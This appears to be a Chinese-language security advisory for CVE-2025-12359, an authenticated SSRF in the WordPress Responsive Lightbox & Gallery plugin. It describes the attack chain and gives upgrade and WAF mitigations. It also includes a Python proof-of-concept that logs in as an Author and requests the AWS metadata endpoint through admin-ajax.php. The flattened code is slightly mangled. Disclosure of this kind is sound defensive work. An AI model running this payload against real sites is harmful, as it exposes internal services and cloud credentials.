IPBUF安全漏洞报告
English
CVE-2025-12359 CVSS 5.4 中危

CVE-2025-12359 WordPress Responsive Lightbox & Gallery插件SSRF漏洞

披露日期: 2025-11-19
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-12359
漏洞类型
服务器端请求伪造(SSRF)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Responsive Lightbox & Gallery插件(WordPress)

相关标签

服务器端请求伪造SSRFWordPress插件CVE-2025-12359认证用户漏洞Responsive Lightbox内网探测

漏洞概述

CVE-2025-12359是WordPress的Responsive Lightbox & Gallery插件中的一个服务器端请求伪造(SSRF)漏洞。该漏洞存在于get_image_size_by_url函数中,由于对用户提供的URL缺乏充分的验证机制,导致具有Author级别及以上的认证用户可以发起Web请求到任意位置。攻击者可以利用此漏洞从Web应用程序向内部服务或外部系统发起请求,用于探测内部网络结构、查询敏感信息或修改内部数据。受影响版本为所有版本直至2.5.3,该漏洞由Wordfence安全团队于2025年11月19日披露,CVSS评分为5.4,属于中等严重程度。

技术细节

漏洞根源在于Responsive Lightbox & Gallery插件的get_image_size_by_url函数在获取图片尺寸时,直接使用用户提供的URL而未进行严格的输入验证和过滤。攻击者(具有Author权限或更高)可以通过构造恶意的URL参数,诱使服务器向任意目标地址发起HTTP/HTTPS请求。由于请求是从服务器端发起的,攻击者可以绕过防火墙限制,访问内部网络资源。漏洞影响的关键文件包括class-fast-image.php(第25行)、class-frontend.php(第1531行)、class-galleries.php(第3648行)和functions.php(第108行)。攻击者利用此漏洞可以探测内网服务、读取本地文件内容、访问云元数据端点或对内部系统进行未授权操作。

攻击链分析

STEP 1
步骤1
攻击者获取WordPress Author级别或更高权限的账户凭据
STEP 2
步骤2
攻击者登录WordPress后台并构造包含恶意URL的请求
STEP 3
步骤3
通过调用get_image_size_by_url函数触发SSRF漏洞
STEP 4
步骤4
服务器向攻击者指定的内部或外部地址发起HTTP/HTTPS请求
STEP 5
步骤5
攻击者获取返回的响应内容,用于信息收集或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-12359 SSRF PoC for Responsive Lightbox & Gallery < 2.5.3 # Requires Author-level WordPress account import requests import sys from urllib.parse import quote target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" wp_user = "author_username" wp_pass = "author_password" # Login to WordPress session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": wp_user, "pwd": wp_pass, "wp-submit": "Log In", "redirect_to": f"{target_url}/wp-admin/" } session.post(login_url, data=login_data) # Exploit SSRF via get_image_size_by_url function # Target internal service or external endpoint ssrf_payload = "http://169.254.169.254/latest/meta-data/" # AWS metadata endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Trigger via gallery image size check params = { "action": "rl_get_image_size", "image_url": ssrf_payload, "gallery_id": 1 } response = session.get(endpoint, params=params) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text[:500]}")

影响范围

Responsive Lightbox & Gallery插件 < 2.5.3

防御指南

临时缓解措施
立即将Responsive Lightbox & Gallery插件升级到最新版本(2.5.4及以上)。如果暂时无法升级,可临时禁用该插件或限制Author级别用户的操作权限,同时在WAF层面添加针对SSRF攻击特征的防护规则,监控异常的外部请求行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表